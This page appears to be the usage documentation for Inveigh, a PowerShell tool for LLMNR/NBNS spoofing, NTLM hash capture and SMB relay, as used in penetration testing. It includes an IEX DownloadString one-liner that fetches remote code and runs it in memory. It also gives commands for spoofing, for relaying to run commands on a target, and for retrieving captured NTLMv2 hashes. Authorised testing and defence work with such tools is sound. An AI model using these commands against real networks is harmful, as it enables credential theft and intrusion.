-
Notifications
You must be signed in to change notification settings - Fork 449
Basics
-
Import with Import-Module
Import-Module ./Inveigh.psd1
-
Import using the dot source method
. ./Inveigh.ps1
. ./Inveigh-Relay.ps1
-
Load into memory using Invoke-Expression
IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")
IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1")
- Tested minimums are PowerShell 2.0 and .NET 3.5
- If a local firewall is enabled, ensure that the targets are able to communicate with the Inveigh host on the relevant ports.
- If you copy/paste challenge/response captures from the console window for password cracking, ensure that carriage returns are removed.
Invoke-Inveigh
- HTTP listener on port 80 with HTTP and WPAD authentication set to NTLM
- LLMNR spoofer - packet sniffer version
- SMB NTLMv1 and NTLMv2 challenge/response capture through the packet sniffer
- Real time console and file outputs are disabled
Invoke-Inveigh
- HTTP listener on port 80 with HTTP and WPAD authentication set to NTLM
- LLMNR spoofer - UDP listener version (likely to be disabled at startup due to Windows default in-use UDP port 5355)
- NBNS spoofer - UDP listener version
- Real time console and file outputs are disabled
Invoke-InveighRelay -Target 192.168.1.100 -Command "do something"
- HTTP listener on port 80 with HTTP and WPAD authentication set to NTLM
- Running Inveigh modules will auto-exit after a successful relay
- Target and Command parameters are mandatory
- Real time console and file outputs are disabled
Both the Inveigh.ps1 and Inveigh-Relay.ps1 files contain identical support functions that permit data retrieval and interaction with the main Inveigh and Inveigh-Relay modules.
- Clear-Inveigh - clear the $inveigh hashtable
- Get-Inveigh - get data from the $inveigh hashtable
- Stop-Inveigh - stop all running Inveigh modules
- Watch-Inveigh - enable real time console output
-
Enable real time console output
Invoke-Inveigh -ConsoleOutput Y
-
Enable inspection only and real time console output
Invoke-Inveigh -Inspect -ConsoleOutput Y
-
Enable real time file output at startup
Invoke-Inveigh -FileOutput Y
-
Enable the NBNS and mDNS spoofers
Invoke-Inveigh -NBNS Y -mDNS Y
-
Enable HTTPS with customized certificate settings
Invoke-Inveigh -HTTPS Y -HTTPSCertIssuer PowerShell -HTTPSCertSubject www
-
Enable proxy authentication captures
Invoke-Inveigh -Proxy Y
-
Stop running Inveigh modules
Stop-Inveigh
-
Get all queued console output
Get-Inveigh
-
Get all captured NTLMv2 challenge/response hashes
Get-Inveigh -NTLMv2